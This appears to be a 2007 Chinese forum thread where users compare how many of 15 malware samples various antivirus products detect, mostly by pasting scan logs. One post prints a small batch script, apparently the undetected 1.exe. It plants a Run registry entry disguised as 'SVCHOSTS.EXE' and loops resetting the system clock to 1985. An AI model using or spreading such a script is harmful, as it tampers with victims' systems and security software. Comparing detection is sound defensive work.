15个

zane_xzz

[MD5: AB273E E44D70 F3655B 0DB6B7 6CB713 6DC56F 208C04 75ED0C CAEA86 307577 80A0E0 A6C9BB FF10EF 6C5064 D42071]

promised

C:\ABC\样本\1.exe - Signature 'Generic.Botget' found
C:\ABC\样本\10.exe - Signature 'Backdoor.Win32.PcClient.GV' found
C:\ABC\样本\11.exe - Signature 'Trojan-Downloader.Win32.Zlob.and' found
C:\ABC\样本\12.exe - Signature 'Trojan-PWS.Win32.Nilage.bga' found
C:\ABC\样本\13.exe - Signature 'Trojan-Downloader.Win32.Zlob.and' found
C:\ABC\样本\14.exe - Signature 'Backdoor.Win32.Agent.ahj' found
C:\ABC\样本\2.exe - Signature 'Trojan-PWS.OnlineGames.AUP' found
C:\ABC\样本\3.exe - Signature 'Trojan-PWS.WSGame.AV' found
C:\ABC\样本\4.exe - Signature 'Trojan-PWS.Win32.OnLineGames.aal' found
C:\ABC\样本\5.exe - Signature 'Trojan-Downloader.Win32.Zlob.and' found
C:\ABC\样本\6.exe - Signature 'Generic.Onlinegames.1' found
C:\ABC\样本\7.exe - Signature 'Trojan-PWS.WSGame.AV' found
C:\ABC\样本\8.exe - Signature 'Trojan-PWS.OnlineGames.AYD' found
C:\ABC\样本\9.exe - Signature 'Trojan-PWS.OnlineGames.AYD' found
C:\ABC\样本\down.exe - Signature 'Backdoor.Win32.Agent.ahj' found

        15 Files scanned
          (0 Archives with 0 files)
        15 Signatures found
        0 Suspect code-parts found
        Used time: 0:00.234

wangjay1980

detected: Trojan program Trojan-Downloader.Win32.Delf.bni        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/down.exe
detected: Trojan program Trojan-Downloader.Win32.Small.czl        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/10.exe//NSPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.zi        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/11.exe//PE_Patch//UPack
detected: Trojan program Trojan-PSW.Win32.QQPass.qg        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/12.exe//UPX
detected: virus Heur.Trojan.Generic (modification)        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/13.exe//PE_Patch//UPack
detected: Trojan program Backdoor.Win32.Delf.awy        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/14.exe//NSPack
detected: Trojan program Trojan-PSW.Win32.Nilage.bkp        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/2.exe//PE_Patch.UPX//UPX
detected: Trojan program Trojan-PSW.Win32.OnLineGames.wz        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/3.exe
detected: Trojan program Trojan-PSW.Win32.OnLineGames.aal        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/4.exe
detected: Trojan program Trojan-PSW.Win32.OnLineGames.qy        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/5.exe//PE_Patch//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.es        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/6.exe
detected: Trojan program Trojan-PSW.Win32.OnLineGames.zl        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/7.exe
detected: Trojan program Trojan-Proxy.Win32.Small.du        File: C:\Documents and Settings\Owner\×ÀÃæ\Ñù±¾.rar/8.exe

zane_xzz

为什么不报1.exe


@Echo Off
Set date=%date%
date 1985-10-18
reg add HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V SVCHOSTS.EXE /T REG_SZ /D C:\WINDOWS\SYSTEM32\1.EXE /F
:a
Set date=%date%
date 1985-10-18
ping 127.0.0.1 -n 10
Goto :a

wangjay1980

有意思

mofunzone

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\样本.rar'
C:\Documents and Settings\Administrator\My Documents\
  样本.rar
    [0] Archive type: RAR
    --> down.exe
        [DETECTION] Is the Trojan horse TR/Dldr.Delf.bni.1
        [WARNING]   Infected files in archives cannot be repaired!
    --> 1.exe
    --> 10.exe
        [DETECTION] Is the Trojan horse TR/Crypt.FKM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> 11.exe
        [DETECTION] Is the Trojan horse TR/PSW.OnLineGames.ZI
        [WARNING]   Infected files in archives cannot be repaired!
    --> 12.exe
        [DETECTION] Is the Trojan horse TR/PSW.QQPass.QG.6
        [WARNING]   Infected files in archives cannot be repaired!
    --> 13.exe
        [DETECTION] Is the Trojan horse TR/PSW.OnLineGam.QW
        [WARNING]   Infected files in archives cannot be repaired!
    --> 14.exe
        [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Agent.YPT.1 Backdoor server programs
        [WARNING]   Infected files in archives cannot be repaired!
    --> 2.exe
        [DETECTION] Is the Trojan horse TR/PSW.OnLineGam.QW
        [WARNING]   Infected files in archives cannot be repaired!
    --> 3.exe
        [DETECTION] Is the Trojan horse TR/PSW.OnLineGames.WZ.37
        [WARNING]   Infected files in archives cannot be repaired!
    --> 4.exe
        [DETECTION] Is the Trojan horse TR/Dropper.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> 5.exe
        [DETECTION] Is the Trojan horse TR/PSW.OnLineGam.QW
        [WARNING]   Infected files in archives cannot be repaired!
    --> 6.exe
        [DETECTION] Is the Trojan horse TR/Spy.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> 7.exe
        [DETECTION] Is the Trojan horse TR/Spy.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> 8.exe
        [DETECTION] Is the Trojan horse TR/Agent.22016.B
        [WARNING]   Infected files in archives cannot be repaired!
    --> 9.exe
        [DETECTION] Is the Trojan horse TR/Agent.22016.B
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!


End of the scan: 2007年7月4日  00:56
Used time: 00:10 min

The scan has been done completely.

      0 Scanning directories
     16 Files were scanned
     14 viruses and/or unwanted programs were found
      0 classified as suspicious:
      0 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      2 Files not concerned
      1 Archives were scanned
     15 Warnings
      0 Notes
      0 Hidden objects were found

欠妳緈諨

AVAST15个

gdmdhxq

瑞星12个

nod也不报1.exe
扫描开始时间: 2007-7-4 16:08:33
扫描日志
NOD32 版本 2377 (20070704) NT
命令行: F:\virus\样本3.rar

日期: 2007年7月4日  时间: 16:08:35
反 Rookits 技术已启用。
已扫描磁盘、文件夹和文件: F:\virus\样本3.rar
F:\virus\样本3.rar ?RAR ?down.exe<病毒 - Win32/TrojanDownloader.Delf.NSA 木马 变种>
F:\virus\样本3.rar ?RAR ?10.exe<病毒 - 未知的 NewHeur_PE 病毒 [7]>
F:\virus\样本3.rar ?RAR ?11.exe<病毒 - Win32/PSW.Legendmir.NEP 木马 变种>
F:\virus\样本3.rar ?RAR ?12.exe<病毒 - 可能是 Win32/PSW.QQPass.VD 木马 变种>
F:\virus\样本3.rar ?RAR ?13.exe<病毒 - Win32/PSW.OnLineGames.NCU 木马>
F:\virus\样本3.rar ?RAR ?14.exe<病毒 - 未知的 NewHeur_PE 病毒 [7]>
F:\virus\样本3.rar ?RAR ?2.exe<病毒 - Win32/PSW.Agent.NEW 木马 变种>
F:\virus\样本3.rar ?RAR ?3.exe<病毒 - Win32/PSW.OnLineGames.YA 木马 变种>
F:\virus\样本3.rar ?RAR ?4.exe<病毒 - Win32/PSW.OnLineGames.YA 木马 变种>
F:\virus\样本3.rar ?RAR ?5.exe<病毒 - Win32/PSW.Agent.NEW 木马 变种>
F:\virus\样本3.rar ?RAR ?6.exe<病毒 - Win32/PSW.OnLineGames.YA 木马 变种>
F:\virus\样本3.rar ?RAR ?7.exe<病毒 - Win32/PSW.OnLineGames.YA 木马 变种>
F:\virus\样本3.rar ?RAR ?8.exe<病毒 - Win32/Agent.NKG 木马>
F:\virus\样本3.rar ?RAR ?9.exe<病毒 - Win32/Agent.NIK 木马 变种>
已扫描文件数量: 15
已发现病毒数量: 14
完成时间: 16:08:41 总共扫描时间: 6 秒 (00:00:06)

注意:
[7] 文件可能感染了未知病毒。

风雪

费尔11个，外加两个启发。